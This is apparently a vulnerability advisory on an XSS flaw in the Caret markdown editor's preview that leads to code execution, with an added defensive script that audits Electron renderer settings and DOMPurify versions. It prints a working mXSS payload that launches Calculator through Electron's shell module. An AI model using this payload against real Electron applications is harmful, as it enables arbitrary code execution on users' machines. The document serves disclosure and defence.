XSS in Caret markdown editor leads to remote code execution when viewing crafted Markdown files
All versions are affected
This issue is caused by insufficient sanitization of the document content before it is handed to the Electron renderer. As the payload below shows, `require` is reachable from page script in that renderer, so any script that survives sanitization runs with the privileges of the Electron process rather than those of an ordinary web page.
Specifically, the getMarkdownHtmlElement function in app.asar/extensions/Markdown/Markdown.js renders the document with:

    t.firstChild.innerHTML = DOMPurify.sanitize(r)
The bundled DOMPurify is an older release with known filtering bypasses. The payload below uses the published mutation-XSS (mXSS) namespace-confusion bypass, fixed in DOMPurify 2.0.17: DOMPurify sanitizes a parsed DOM tree and returns its serialization, but when innerHTML re-parses that serialized string the browser builds a different tree, and the `<img>` with its onerror handler becomes a live element that the sanitizer never saw as such.
Opening a document with the following contents while preview mode is enabled immediately launches an arbitrary program (here the Windows Calculator):
<form><math><mtext></form><form><mglyph><style></math><img src
onerror="try{ const {shell} = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">
Workaround: disable Caret's "Preview Mode" so that untrusted Markdown is never rendered to HTML inside the editor.
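Two independent weaknesses combine in this advisory: a sanitizer that can be bypassed, and a renderer in which a bypass reaches Node APIs. The following is an added example, not Caret's code, that shows the weak Electron webPreferences the payload relies on next to a hardened set, and a small audit that flags both the renderer settings and a DOMPurify build older than the 2.0.17 mXSS fix. The webPreferences objects and bundle descriptions are constructed samples; the preload path is hypothetical.

```javascript
// Added example (not Caret's code): audit an Electron BrowserWindow's
// webPreferences and the bundled DOMPurify version for the two weaknesses
// that turn a sanitizer bypass into code execution in this advisory.
// Object keys mirror Electron's real webPreferences options; the DOMPurify
// threshold follows the published namespace-confusion mXSS fix (2.0.17).

// Weak settings (constructed sample, matching older Electron defaults, not
// copied from Caret): Node APIs are reachable from rendered HTML, so
// `require('electron')` works inside an onerror handler.
const weakWebPreferences = {
  nodeIntegration: true,
  contextIsolation: false,
  sandbox: false,
};

// Hardened settings: the renderer is a plain browser context. Even a
// successful XSS cannot reach `require`, `process` or the `shell` module;
// anything the page legitimately needs is exposed through a preload script.
const hardenedWebPreferences = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
  preload: '/app/preload.js', // hypothetical path; expose only narrow IPC here
};

// Return the findings for one webPreferences object. Electron's defaults
// changed across major versions, so a missing key is treated as unsafe:
// a reviewer wants to see the secure value set explicitly.
function auditWebPreferences(prefs) {
  const findings = [];
  if (prefs.nodeIntegration !== false) {
    findings.push('nodeIntegration must be false: renderer JS can call require()');
  }
  if (prefs.contextIsolation !== true) {
    findings.push('contextIsolation must be true: page JS shares a world with preload');
  }
  if (prefs.sandbox !== true) {
    findings.push('sandbox should be true: limits what a compromised renderer can do');
  }
  return findings;
}

// Compare dotted version strings numerically ("2.0.16" < "2.0.17" < "2.2.0").
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// DOMPurify releases before 2.0.17 are affected by the namespace-confusion
// mXSS bypass that the advisory's <form><math><mtext>... payload uses.
// At runtime the bundled version is available as DOMPurify.version.
const DOMPURIFY_MXSS_FIXED_IN = '2.0.17';
function domPurifyNeedsUpgrade(version) {
  return compareVersions(version, DOMPURIFY_MXSS_FIXED_IN) < 0;
}

// Combine both checks for one description of an app bundle.
function auditBundle(bundle) {
  const findings = auditWebPreferences(bundle.webPreferences);
  if (domPurifyNeedsUpgrade(bundle.domPurifyVersion)) {
    findings.push(
      `DOMPurify ${bundle.domPurifyVersion} predates ${DOMPURIFY_MXSS_FIXED_IN}: known mXSS bypasses`
    );
  }
  return findings;
}

// Usage with constructed bundle descriptions: the first reports four
// findings, the second reports none.
console.log(auditBundle({ webPreferences: weakWebPreferences, domPurifyVersion: '2.0.16' }));
console.log(auditBundle({ webPreferences: hardenedWebPreferences, domPurifyVersion: '2.2.9' }));
```

Upgrading DOMPurify alone closes this particular bypass but leaves the renderer one sanitizer bug away from code execution again; disabling nodeIntegration and enabling contextIsolation is what turns a future XSS in the preview back into an ordinary web-page problem.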